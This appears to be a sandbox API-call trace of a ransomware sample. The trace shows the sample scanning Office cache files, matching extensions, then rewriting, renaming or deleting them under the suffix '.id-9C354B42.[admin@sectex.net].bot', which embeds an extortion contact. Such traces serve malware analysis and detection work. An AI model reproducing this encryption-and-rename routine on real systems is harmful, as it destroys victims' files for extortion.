	[0046.251] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 1
	[0046.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.252] lstrlenW (lpString=".doc") returned 4
	[0046.252] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0046.252] lstrlenW (lpString=".docx") returned 5
	[0046.252] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1
	[0046.252] lstrlenW (lpString=".pdf") returned 4
	[0046.252] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0046.252] lstrlenW (lpString=".xls") returned 4
	[0046.252] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0046.252] lstrlenW (lpString=".xlsx") returned 5
	[0046.252] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1
	[0046.252] lstrlenW (lpString=".ppt") returned 4
	[0046.252] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0046.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.252] lstrlenW (lpString=".zip") returned 4
	[0046.252] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0046.252] lstrlenW (lpString=".rar") returned 4
	[0046.252] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0046.252] lstrlenW (lpString=".bz2") returned 4
	[0046.252] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0046.252] lstrlenW (lpString=".7z") returned 3
	[0046.252] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0046.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.252] lstrlenW (lpString=".dbf") returned 4
	[0046.252] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0046.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.252] lstrlenW (lpString=".1cd") returned 4
	[0046.252] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0046.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.253] lstrlenW (lpString=".jpg") returned 4
	[0046.253] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0046.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.253] lstrlenW (lpString=".doc") returned 4
	[0046.253] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0046.253] lstrlenW (lpString=".docx") returned 5
	[0046.253] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1
	[0046.253] lstrlenW (lpString=".pdf") returned 4
	[0046.253] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0046.253] lstrlenW (lpString=".xls") returned 4
	[0046.253] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0046.253] lstrlenW (lpString=".xlsx") returned 5
	[0046.253] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1
	[0046.253] lstrlenW (lpString=".ppt") returned 4
	[0046.253] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0046.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.253] lstrlenW (lpString=".zip") returned 4
	[0046.253] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0046.253] lstrlenW (lpString=".rar") returned 4
	[0046.253] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0046.253] lstrlenW (lpString=".bz2") returned 4
	[0046.253] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0046.253] lstrlenW (lpString=".7z") returned 3
	[0046.253] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0046.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.253] lstrlenW (lpString=".dbf") returned 4
	[0046.253] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0046.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.253] lstrlenW (lpString=".1cd") returned 4
	[0046.253] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0046.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79
	[0046.253] lstrlenW (lpString=".jpg") returned 4
	[0046.254] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0046.254] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0046.254] lstrlenW (lpString="ose.exe") returned 7
	[0046.254] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0046.254] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=174440) returned 1
	[0046.254] CloseHandle (hObject=0x200) returned 1
	[0046.254] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020
	[0046.254] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.254] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0046.254] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.254] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.255] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0046.255] GetLastError () returned 0x0
	[0046.255] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x2a968, lpOverlapped=0x0) returned 1
	[0046.259] WriteFile (in: hFile=0x1a0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x2a970, lpOverlapped=0x0) returned 1
	[0046.265] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.265] WriteFile (in: hFile=0x1a0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0046.265] SetEndOfFile (hFile=0x1a0) returned 1
	[0046.266] CloseHandle (hObject=0x1a0) returned 1
	[0046.266] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.266] SetEndOfFile (hFile=0x200) returned 1
	[0046.267] CloseHandle (hObject=0x200) returned 1
	[0046.267] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0046.268] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1
	[0046.268] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.268] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.268] lstrlenW (lpString=".doc") returned 4
	[0046.268] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0046.268] lstrlenW (lpString=".docx") returned 5
	[0046.268] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1
	[0046.268] lstrlenW (lpString=".pdf") returned 4
	[0046.268] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0046.268] lstrlenW (lpString=".xls") returned 4
	[0046.268] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0046.268] lstrlenW (lpString=".xlsx") returned 5
	[0046.268] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1
	[0046.268] lstrlenW (lpString=".ppt") returned 4
	[0046.268] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0046.268] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.268] lstrlenW (lpString=".zip") returned 4
	[0046.268] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0046.268] lstrlenW (lpString=".rar") returned 4
	[0046.268] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0046.268] lstrlenW (lpString=".bz2") returned 4
	[0046.268] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0046.269] lstrlenW (lpString=".7z") returned 3
	[0046.269] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0046.269] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.269] lstrlenW (lpString=".dbf") returned 4
	[0046.269] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0046.269] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.269] lstrlenW (lpString=".1cd") returned 4
	[0046.269] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0046.269] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.269] lstrlenW (lpString=".jpg") returned 4
	[0046.269] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0046.269] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.269] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.269] lstrlenW (lpString=".doc") returned 4
	[0046.269] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0046.269] lstrlenW (lpString=".docx") returned 5
	[0046.269] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1
	[0046.269] lstrlenW (lpString=".pdf") returned 4
	[0046.269] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0046.269] lstrlenW (lpString=".xls") returned 4
	[0046.269] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0046.269] lstrlenW (lpString=".xlsx") returned 5
	[0046.269] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1
	[0046.269] lstrlenW (lpString=".ppt") returned 4
	[0046.269] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0046.269] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.269] lstrlenW (lpString=".zip") returned 4
	[0046.269] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0046.269] lstrlenW (lpString=".rar") returned 4
	[0046.269] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0046.269] lstrlenW (lpString=".bz2") returned 4
	[0046.269] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0046.269] lstrlenW (lpString=".7z") returned 3
	[0046.269] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0046.270] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.270] lstrlenW (lpString=".dbf") returned 4
	[0046.270] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0046.270] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.270] lstrlenW (lpString=".1cd") returned 4
	[0046.270] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0046.270] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70
	[0046.270] lstrlenW (lpString=".jpg") returned 4
	[0046.270] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0046.270] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0046.270] lstrlenW (lpString="osetup.dll") returned 10
	[0046.270] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0046.270] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=7378792) returned 1
	[0046.270] CloseHandle (hObject=0x200) returned 1
	[0046.270] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020
	[0046.271] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.271] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0046.271] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0046.271] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0046.271] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.271] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.276] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.276] ReadFile (in: hFile=0x200, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.279] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0046.279] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.279] ReadFile (in: hFile=0x200, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.426] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.426] WriteFile (in: hFile=0x200, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0100, lpOverlapped=0x0) returned 1
	[0046.445] SetEndOfFile (hFile=0x200) returned 1
	[0046.445] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0046.527] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.527] WriteFile (in: hFile=0x200, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.529] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.529] WriteFile (in: hFile=0x200, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.531] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.531] WriteFile (in: hFile=0x200, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.532] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0046.532] CloseHandle (hObject=0x200) returned 1
	[0046.532] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.533] lstrlenW (lpString=".doc") returned 4
	[0046.533] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0046.533] lstrlenW (lpString=".docx") returned 5
	[0046.533] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1
	[0046.533] lstrlenW (lpString=".pdf") returned 4
	[0046.533] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0046.533] lstrlenW (lpString=".xls") returned 4
	[0046.533] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0046.533] lstrlenW (lpString=".xlsx") returned 5
	[0046.533] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1
	[0046.533] lstrlenW (lpString=".ppt") returned 4
	[0046.533] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.533] lstrlenW (lpString=".zip") returned 4
	[0046.533] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0046.533] lstrlenW (lpString=".rar") returned 4
	[0046.533] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0046.533] lstrlenW (lpString=".bz2") returned 4
	[0046.533] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0046.533] lstrlenW (lpString=".7z") returned 3
	[0046.533] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.533] lstrlenW (lpString=".dbf") returned 4
	[0046.533] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.533] lstrlenW (lpString=".1cd") returned 4
	[0046.533] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.533] lstrlenW (lpString=".jpg") returned 4
	[0046.533] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0046.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.534] lstrlenW (lpString=".doc") returned 4
	[0046.534] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0046.534] lstrlenW (lpString=".docx") returned 5
	[0046.534] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1
	[0046.534] lstrlenW (lpString=".pdf") returned 4
	[0046.534] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0046.534] lstrlenW (lpString=".xls") returned 4
	[0046.534] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0046.534] lstrlenW (lpString=".xlsx") returned 5
	[0046.534] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1
	[0046.534] lstrlenW (lpString=".ppt") returned 4
	[0046.534] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0046.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.534] lstrlenW (lpString=".zip") returned 4
	[0046.534] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0046.534] lstrlenW (lpString=".rar") returned 4
	[0046.534] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0046.534] lstrlenW (lpString=".bz2") returned 4
	[0046.534] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0046.534] lstrlenW (lpString=".7z") returned 3
	[0046.534] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0046.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.534] lstrlenW (lpString=".dbf") returned 4
	[0046.534] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0046.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.534] lstrlenW (lpString=".1cd") returned 4
	[0046.534] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0046.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73
	[0046.534] lstrlenW (lpString=".jpg") returned 4
	[0046.534] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0046.535] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0046.535] lstrlenW (lpString="ProPlusrWW.msi") returned 14
	[0046.535] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0046.535] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=27532288) returned 1
	[0046.535] CloseHandle (hObject=0x200) returned 1
	[0046.539] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi")) returned 0x2020
	[0046.539] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.539] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
